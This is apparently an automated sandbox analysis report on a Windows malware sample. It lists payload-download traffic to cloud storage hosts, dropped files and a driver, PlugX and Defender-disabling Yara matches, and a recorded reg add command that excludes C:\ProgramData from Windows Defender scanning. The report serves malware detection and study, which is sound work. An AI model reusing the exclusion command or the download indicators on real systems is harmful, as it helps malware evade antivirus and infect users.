Source: global traffic	HTTP traffic detected: GET /b.gif HTTP/1.1User-Agent: 3MHost: khec3y.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /c.gif HTTP/1.1User-Agent: 3MHost: khec3y.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d.gif HTTP/1.1User-Agent: 3MHost: khec3y.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /s.dat HTTP/1.1User-Agent: 3MHost: khec3y.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /s.jpg HTTP/1.1User-Agent: 3MHost: khec3y.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /drops.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f.dat HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /FOM-50.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /FOM-51.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /FOM-52.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /FOM-53.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: khec3y.oss-cn-beijing.aliyuncs.com
Source: global traffic	DNS traffic detected: DNS query: 22mm.oss-cn-hangzhou.aliyuncs.com
Source: global traffic	DNS traffic detected: DNS query: gnkygm.net

Source: YYAfLM.exe, YYAfLM.exe, 00000027.00000002.3583385721.0000000004CA0000.00000004.00000020.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3584084700.000000001002D000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://%s/%d.dll
Source: YYAfLM.exe, 00000027.00000002.3583385721.0000000004CA0000.00000004.00000020.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3584084700.000000001002D000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://%s/%d.dllC:
Source: YYAfLM.exe, YYAfLM.exe, 00000027.00000002.3583385721.0000000004CA0000.00000004.00000020.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3584084700.000000001002D000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://%s/ip.txt
Source: YYAfLM.exe, 00000027.00000002.3583385721.0000000004CA0000.00000004.00000020.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3584084700.000000001002D000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://%s/ip.txtC:
Source: YYAfLM.exe, YYAfLM.exe, 00000027.00000002.3583385721.0000000004CA0000.00000004.00000020.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3584084700.000000001002D000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://%s/upx.rar
Source: YYAfLM.exe, 00000027.00000002.3583385721.0000000004CA0000.00000004.00000020.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3584084700.000000001002D000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://%s/upx.rarC:
Source: 189atohci.sys.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: 189atohci.sys.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: 149876985-734579485.05.exe, 00000000.00000003.2239671377.000000000063B000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2144209470.000000000063B000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2170624744.000000000063B000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2239600206.000000000063B000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2144422802.0000000000659000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2195534738.000000000063B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: RgZ5EJ.exe.0.dr, 189atohci.sys.0.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: 189atohci.sys.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 189atohci.sys.0.dr	String found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: 189atohci.sys.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 189atohci.sys.0.dr	String found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: 189atohci.sys.0.dr	String found in binary or memory: http://ocsp.digicert.com0I
Source: 189atohci.sys.0.dr	String found in binary or memory: http://ocsp.digicert.com0P
Source: RgZ5EJ.exe.0.dr, 189atohci.sys.0.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: RgZ5EJ.exe.0.dr	String found in binary or memory: http://s.symcb.com/pca3-g5.crl0
Source: RgZ5EJ.exe.0.dr	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: RgZ5EJ.exe.0.dr	String found in binary or memory: http://s.symcd.com06
Source: RgZ5EJ.exe.0.dr	String found in binary or memory: http://s.symcd.com0_
Source: RgZ5EJ.exe.0.dr	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: RgZ5EJ.exe.0.dr	String found in binary or memory: http://s2.symcb.com0
Source: RgZ5EJ.exe.0.dr	String found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: RgZ5EJ.exe.0.dr	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: RgZ5EJ.exe.0.dr	String found in binary or memory: http://sv.symcd.com0&
Source: RgZ5EJ.exe.0.dr	String found in binary or memory: http://sw.symcb.com/sw.crl0
Source: RgZ5EJ.exe.0.dr	String found in binary or memory: http://sw.symcd.com0
Source: RgZ5EJ.exe.0.dr	String found in binary or memory: http://sw1.symcb.com/sw.crt0
Source: 149876985-734579485.05.exe	String found in binary or memory: http://toro.d.dooo.jp/index.html)k0
Source: 149876985-734579485.05.exe	String found in binary or memory: http://toro.d.dooo.jp/index.htmlTORO
Source: 149876985-734579485.05.exe	String found in binary or memory: http://toro.d.dooo.jp/report/receive.cgi?exe=ClockPod
Source: RgZ5EJ.exe.0.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: RgZ5EJ.exe.0.dr, 189atohci.sys.0.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: RgZ5EJ.exe.0.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: RgZ5EJ.exe.0.dr, 189atohci.sys.0.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: RgZ5EJ.exe.0.dr, 189atohci.sys.0.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: RgZ5EJ.exe.0.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: 189atohci.sys.0.dr	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: RgZ5EJ.exe.0.dr	String found in binary or memory: http://www.symauth.com/cps0(
Source: RgZ5EJ.exe.0.dr	String found in binary or memory: http://www.symauth.com/rpa00
Source: RgZ5EJ.exe, 00000006.00000003.2891470624.0000000003FFD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpg
Source: RgZ5EJ.exe, 00000006.00000003.2891470624.0000000003FFD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpghttps://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51
Source: RgZ5EJ.exe, 00000006.00000003.2891470624.0000000003FFD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpg
Source: RgZ5EJ.exe, 00000006.00000003.2891470624.0000000003FFD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-52.jpg
Source: RgZ5EJ.exe, 00000006.00000003.2891470624.0000000003FFD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-53.jpg
Source: RgZ5EJ.exe.0.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: RgZ5EJ.exe.0.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: RgZ5EJ.exe.0.dr	String found in binary or memory: https://d.symcb.com/rpa0)
Source: RgZ5EJ.exe.0.dr	String found in binary or memory: https://d.symcb.com/rpa0.
Source: 149876985-734579485.05.exe, 00000000.00000003.2170680198.00000000005E1000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2195680697.00000000005E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://khec3y.oss-cn-beijing.aliyuncs.com/
Source: 149876985-734579485.05.exe, 00000000.00000003.2239671377.0000000000610000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2239600206.0000000000608000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://khec3y.oss-cn-beijing.aliyuncs.com/4
Source: 149876985-734579485.05.exe, 00000000.00000003.2195680697.00000000005E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://khec3y.oss-cn-beijing.aliyuncs.com/7-2476756634-10025
Source: 149876985-734579485.05.exe, 00000000.00000003.2170680198.00000000005E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://khec3y.oss-cn-beijing.aliyuncs.com/7-2476756634-1002rshell.exe
Source: 149876985-734579485.05.exe, 00000000.00000003.2195534738.000000000063B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://khec3y.oss-cn-beijing.aliyuncs.com/a.gif
Source: 149876985-734579485.05.exe, 00000000.00000003.2239671377.000000000063B000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2170624744.000000000063B000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2239600206.000000000063B000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2195534738.000000000063B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://khec3y.oss-cn-beijing.aliyuncs.com/a.gif(y
Source: 149876985-734579485.05.exe, 00000000.00000003.2170624744.000000000063B000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2195534738.000000000063B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://khec3y.oss-cn-beijing.aliyuncs.com/a.gif8
Source: 149876985-734579485.05.exe, 00000000.00000003.2239671377.000000000063B000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2170624744.000000000063B000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2239600206.000000000063B000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2195534738.000000000063B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://khec3y.oss-cn-beijing.aliyuncs.com/a.gifcate
Source: 149876985-734579485.05.exe, 00000000.00000003.2170624744.000000000063B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://khec3y.oss-cn-beijing.aliyuncs.com/a.gifcrosoft
Source: 149876985-734579485.05.exe, 00000000.00000003.2239671377.000000000063B000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2170624744.000000000063B000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2239600206.000000000063B000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2195534738.000000000063B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://khec3y.oss-cn-beijing.aliyuncs.com/a.gifhttps://khec3y.oss-cn-beijing.aliyuncs.com/b.gifhttp
Source: 149876985-734579485.05.exe, 00000000.00000003.2195534738.000000000063B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://khec3y.oss-cn-beijing.aliyuncs.com/a.gifl.aliy
Source: 149876985-734579485.05.exe, 00000000.00000003.2195534738.000000000063B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://khec3y.oss-cn-beijing.aliyuncs.com/b.gif
Source: 149876985-734579485.05.exe, 00000000.00000003.2195534738.000000000063B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://khec3y.oss-cn-beijing.aliyuncs.com/b.gif.
Source: 149876985-734579485.05.exe, 00000000.00000003.2195534738.000000000063B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://khec3y.oss-cn-beijing.aliyuncs.com/b.gifCert.cr
Source: 149876985-734579485.05.exe, 00000000.00000003.2239671377.000000000063B000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2239600206.000000000063B000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2195534738.000000000063B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://khec3y.oss-cn-beijing.aliyuncs.com/b.gifJ
Source: 149876985-734579485.05.exe, 00000000.00000003.2239671377.000000000063B000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2239600206.000000000063B000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2195534738.000000000063B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://khec3y.oss-cn-beijing.aliyuncs.com/b.gifRoot
Source: 149876985-734579485.05.exe, 00000000.00000003.2239671377.000000000063B000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2239600206.000000000063B000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2195534738.000000000063B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://khec3y.oss-cn-beijing.aliyuncs.com/b.gifd
Source: 149876985-734579485.05.exe, 00000000.00000003.2195534738.000000000063B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://khec3y.oss-cn-beijing.aliyuncs.com/b.gifgc
Source: 149876985-734579485.05.exe, 00000000.00000003.2195534738.000000000063B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://khec3y.oss-cn-beijing.aliyuncs.com/b.gifo
Source: 149876985-734579485.05.exe, 00000000.00000003.2195680697.00000000005E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://khec3y.oss-cn-beijing.aliyuncs.com/beijing.aliyuncs.com/7-2476756634-1002rshell.exe
Source: 149876985-734579485.05.exe, 00000000.00000003.2239600206.000000000063B000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2195534738.000000000063B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://khec3y.oss-cn-beijing.aliyuncs.com/c.gif
Source: 149876985-734579485.05.exe, 00000000.00000003.2239671377.000000000063B000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2239600206.000000000063B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://khec3y.oss-cn-beijing.aliyuncs.com/c.gifCert.cr
Source: 149876985-734579485.05.exe, 00000000.00000003.2239600206.000000000063B000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2195534738.000000000063B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://khec3y.oss-cn-beijing.aliyuncs.com/d.gif
Source: 149876985-734579485.05.exe, 00000000.00000003.2239671377.000000000063B000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2239600206.000000000063B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://khec3y.oss-cn-beijing.aliyuncs.com/d.gifP
Source: 149876985-734579485.05.exe, 00000000.00000003.2239671377.000000000063B000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2239600206.000000000063B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://khec3y.oss-cn-beijing.aliyuncs.com/d.gifgc
Source: 149876985-734579485.05.exe, 00000000.00000003.2239671377.000000000063B000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2239600206.000000000063B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://khec3y.oss-cn-beijing.aliyuncs.com/d.gifo
Source: 149876985-734579485.05.exe, 00000000.00000003.2144209470.000000000063B000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2170680198.00000000005E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://khec3y.oss-cn-beijing.aliyuncs.com/i.dat
Source: 149876985-734579485.05.exe, 00000000.00000003.2170680198.00000000005E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://khec3y.oss-cn-beijing.aliyuncs.com/i.datl
Source: 149876985-734579485.05.exe, 00000000.00000003.2170680198.00000000005E1000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2195680697.00000000005E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://khec3y.oss-cn-beijing.aliyuncs.com/l
Source: 149876985-734579485.05.exe, 00000000.00000003.2170680198.00000000005E1000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2195680697.00000000005E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://khec3y.oss-cn-beijing.aliyuncs.com/v
Source: 189atohci.sys.0.dr	String found in binary or memory: https://www.digicert.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 59.110.190.21:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 59.110.190.21:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 118.178.60.9:443 -> 192.168.2.4:50011 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 4.2.RgZ5EJ.exe.2790000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 39.2.YYAfLM.exe.3b60000.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: Process Memory Space: YYAfLM.exe PID: 5212, type: MEMORYSTR	Matched rule: PlugX Identifying Strings Author: Seth Hardy

PE file contains section with special chars

Source: tbcore3U.dll.6.dr	Static PE information: section name: .%?.
Source: tbcore3U.dll.6.dr	Static PE information: section name: .%-[
Source: tbcore3U.dll.6.dr	Static PE information: section name: .mo:
Source: tbcore3U.dll.39.dr	Static PE information: section name: .%?.
Source: tbcore3U.dll.39.dr	Static PE information: section name: .%-[
Source: tbcore3U.dll.39.dr	Static PE information: section name: .mo:

Source: C:\Users\user\Documents\RgZ5EJ.exe

Code function: 4_2_0000000140006C95 NtAllocateVirtualMemory,

4_2_0000000140006C95

Source: C:\Users\user\Documents\RgZ5EJ.exe

Code function: 4_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,

4_2_0000000140001520

Source: C:\Users\user\Desktop\149876985-734579485.05.exe

File created: C:\Windows\System32\drivers\189atohci.sys

Jump to behavior

Source: C:\Users\user\Desktop\149876985-734579485.05.exe

File created: C:\Windows\System32\drivers\189atohci.sys

Jump to behavior

Source: C:\Users\user\Desktop\149876985-734579485.05.exe

File created: C:\Windows\System32\drivers\189atohci.sys

Jump to behavior

Source: C:\Users\user\Documents\RgZ5EJ.exe	Code function: 4_2_000000014000C3F0	4_2_000000014000C3F0
Source: C:\Users\user\Documents\RgZ5EJ.exe	Code function: 4_2_000000014000CC00	4_2_000000014000CC00
Source: C:\Users\user\Documents\RgZ5EJ.exe	Code function: 4_2_0000000140001A30	4_2_0000000140001A30
Source: C:\Users\user\Documents\RgZ5EJ.exe	Code function: 4_2_000000014000C2A0	4_2_000000014000C2A0
Source: C:\Users\user\Documents\RgZ5EJ.exe	Code function: 4_2_00000001400022C0	4_2_00000001400022C0
Source: C:\Users\user\Documents\RgZ5EJ.exe	Code function: 4_2_00000001400110F0	4_2_00000001400110F0
Source: C:\Users\user\Documents\RgZ5EJ.exe	Code function: 4_2_0000000140010CF0	4_2_0000000140010CF0
Source: C:\Users\user\Documents\RgZ5EJ.exe	Code function: 4_2_0000000140009300	4_2_0000000140009300
Source: C:\Users\user\Documents\RgZ5EJ.exe	Code function: 4_2_000000014000BB70	4_2_000000014000BB70
Source: C:\Users\user\Documents\RgZ5EJ.exe	Code function: 4_2_0000000140003F80	4_2_0000000140003F80
Source: C:\Users\user\Documents\RgZ5EJ.exe	Code function: 4_2_00000001400103D0	4_2_00000001400103D0
Source: C:\Users\user\Documents\RgZ5EJ.exe	Code function: 4_2_00007FFE1A520248	4_2_00007FFE1A520248
Source: C:\Users\user\Documents\RgZ5EJ.exe	Code function: 4_2_00007FFE1A51A1B8	4_2_00007FFE1A51A1B8
Source: C:\Program Files (x86)\1pZu9Rh\XKXK7Ueky.exe	Code function: 41_2_002C4AE2	41_2_002C4AE2

Source: Joe Sandbox View

Dropped File: C:\Program Files (x86)\1pZu9Rh\XKXK7Ueky.exe 7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722

Source: 149876985-734579485.05.exe, 00000000.00000003.2239570733.00000000047F1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSa.dllp( vs 149876985-734579485.05.exe
Source: 149876985-734579485.05.exe, 00000000.00000000.1712481933.0000000141D91000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameCLOCKPOD64.EXE2 vs 149876985-734579485.05.exe
Source: 149876985-734579485.05.exe	Binary or memory string: OriginalFilenameCLOCKPOD64.EXE2 vs 149876985-734579485.05.exe

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f

Source: 4.2.RgZ5EJ.exe.2790000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 39.2.YYAfLM.exe.3b60000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: Process Memory Space: YYAfLM.exe PID: 5212, type: MEMORYSTR	Matched rule: PlugXStrings author = Seth Hardy, description = PlugX Identifying Strings, last_modified = 2014-06-12

Source: 189atohci.sys.0.dr	Binary string: \Device\Driver\
Source: 189atohci.sys.0.dr	Binary string: \Device\TrueSight

Source: classification engine

Classification label: mal100.troj.evad.winEXE@64/29@9/3

Source: C:\Users\user\Documents\RgZ5EJ.exe

Code function: 4_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,

4_2_0000000140003F80

Source: C:\Users\user\Documents\RgZ5EJ.exe

Code function: GetModuleFileNameW,OpenSCManagerW,GetLastError,CreateServiceW,CloseServiceHandle,GetLastError,CloseServiceHandle,

4_2_0000000140001430

Source: C:\Users\user\Documents\RgZ5EJ.exe

4_2_0000000140001520

Source: C:\Users\user\Documents\RgZ5EJ.exe

4_2_0000000140001520

Source: C:\Users\user\Documents\RgZ5EJ.exe

File created: C:\Program Files (x86)\YYAfLM

Jump to behavior

Source: C:\Users\user\Desktop\149876985-734579485.05.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\i[1].dat

Jump to behavior

Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\IEToolbarUninstaller
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:504:120:WilError_03
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Mutant created: \Sessions\1\BaseNamedObjects\8.210.209.78:8917:Sauron
Source: C:\Users\user\Desktop\149876985-734579485.05.exe	Mutant created: \Sessions\1\BaseNamedObjects\26f3475fc22
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4040:120:WilError_03
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Mutant created: \Sessions\1\BaseNamedObjects\{4E062DDA-444A-A2A8-84CE-E105F66A5AB3}
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:2672:120:WilError_03
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Mutant created: \Sessions\1\BaseNamedObjects\aefd_910646
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:404:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2716:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4852:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2664:120:WilError_03
Source: C:\Users\user\Documents\RgZ5EJ.exe	Mutant created: \Sessions\1\BaseNamedObjects\48c47662941
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7752:120:WilError_03
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Mutant created: \Sessions\1\BaseNamedObjects\LJPXYXC
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:1376:120:WilError_03

Source: C:\Program Files (x86)\1pZu9Rh\XKXK7Ueky.exe	Command line argument: tbcore3.dll	41_2_002C1000
Source: C:\Program Files (x86)\1pZu9Rh\XKXK7Ueky.exe	Command line argument: tbcore3.dll	41_2_002C1000
Source: C:\Program Files (x86)\1pZu9Rh\XKXK7Ueky.exe	Command line argument: tbcore3U.dll	41_2_002C1000
Source: C:\Program Files (x86)\1pZu9Rh\XKXK7Ueky.exe	Command line argument: tbcore3U.dll	41_2_002C1000
Source: C:\Program Files (x86)\1pZu9Rh\XKXK7Ueky.exe	Command line argument: .,	41_2_002C2E30

Source: 149876985-734579485.05.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Documents\RgZ5EJ.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\149876985-734579485.05.exe

